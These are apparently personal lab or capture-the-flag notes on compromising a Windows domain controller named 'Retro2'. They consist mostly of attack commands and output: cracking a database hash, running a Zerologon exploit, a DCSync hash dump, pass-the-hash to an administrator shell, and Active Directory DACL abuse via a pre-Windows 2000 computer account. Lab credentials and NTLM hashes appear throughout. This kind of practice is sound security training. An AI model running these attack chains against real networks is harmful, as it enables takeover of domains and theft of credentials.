Retro2

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows Server 2008 R2 Datacenter 7601 Service Pack 1

Chain: False (standalone compromise)

Credentials

Username	Password	Method	Scope
Public_DB_staff.accdb	class08	Bruteforce attack	Microsoft Access Database
ldapreader	ppYaVcB5R	Inside the Microsoft Access Database file	Domain User

✅ Valid Usernames

laura.davies
rhys.richards
leah.robinson
michelle.bird
kayleigh.stephenson
charles.singh
sam.humphreys
margaret.austin
caroline.james
lynda.giles
emily.price
lynne.dennis
alexandra.black
alex.scott
mandy.davies
marilyn.whitehouse
lindsey.harrison
sally.davey
admws01$
inventory
services
ldapreader
fs01$
fs02$

🔑 Passwords list

class08
ppYaVcB5R

Information Gathering

Service enumeration

DNS

• Not vulnerable to DNS AXFR

SMB (enum4linux-ng)

• Server allows null session

• Server allows guest session

• RID Bruteforce attack retrieved a list of valid users

• Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Obsolete)

• Vulnerable to Zerologon

Initial Enumeration

Discovering a Microsoft Access Database protected with password

nxc smb 10.10.120.69 -u 'Intrusionz3r0' -p '' --shares -M spider_plus

{
    "Public": {
        "DB/staff.accdb": {
            "atime_epoch": "2024-08-17 08:07:06",
            "ctime_epoch": "2024-08-17 08:06:49",
            "mtime_epoch": "2024-08-17 10:30:34",
            "size": "856 KB"
        }
    }
}

Brute-forcing the database hash and obtaining the plain text credentials

office2john 10.10.120.69-Public_DB_staff.accdb > database_hash

❯ hashcat -m 9600 database_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIF>
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

<SNIF>

$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08

Moving the file to my machine and viewered the content

strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "ppYaVcB5R"

Exploitation

Path: Zerologon

nxc smb 10.10.120.69 -u 'ldapreader' -p 'ppYaVcB5R' -M zerologon
SMB         10.10.120.69    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.120.69    445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R 
ZEROLOGON   10.10.120.69    445    BLN01            VULNERABLE
ZEROLOGON   10.10.120.69    445    BLN01            Next step: https://github.com/dirkjanm/CVE-2020-1472

Abusing the zerologon vulnerability

python3 cve-2020-1472-exploit.py BLN01 10.10.120.69
Performing authentication attempts...
===============================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Performing DCSync attack

❯ impacket-secretsdump 'BLN01$'@10.10.120.69 -no-pass -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c06552bdb50ada21a7c74536c231b848:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::

Obtaining a shell as Administrator

❯ impacket-wmiexec retro2.vl/Administrator@10.10.120.69 -hashes :c06552bdb50ada21a7c74536c231b848
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro2\administrator
C:\>

Path: DACLs

Visualizing the attack path

Discovering a pre-Windows 2000 computer account

​In Active Directory, when administrators create computer accounts with the "Assign this computer account as a pre-Windows 2000 computer" option enabled, the system sets the account's password to the computer's name in lowercase. For example, a computer account named "Workstation1$" would have a default password of "workstation1"

nxc smb 10.10.120.69 -u 'FS01$' -p 'fs01'
SMB         10.10.120.69    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.120.69    445    BLN01            [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

Changing the default password

❯ impacket-changepasswd retro2.vl/'FS01$':'fs01'@10.10.120.69 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

New password: 
Retype new password: 
[*] Changing the password of retro2.vl\FS01$
[*] Connecting to DCE/RPC as retro2.vl\FS01$
[*] Password was changed successfully.

Abusing GenericWrite over ADMWS01$

❯ bloodyAD -u 'FS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 set password 'ADMWS01$' 'password123'
[+] Password changed successfully!

Adding ldapreader user to Remote Desktop Users

❯ bloodyAD -u 'ADMWS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 add groupMember services ldapreader
[+] ldapreader added to services

❯ xfreerdp /v:10.10.120.69 /u:ldapreader /p:ppYaVcB5R /d:retro2.vl /tls-seclevel:0

Privilege Escalation

RpcEptMapper exploit

GitHub - itm4n/Perfusion: Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)GitHub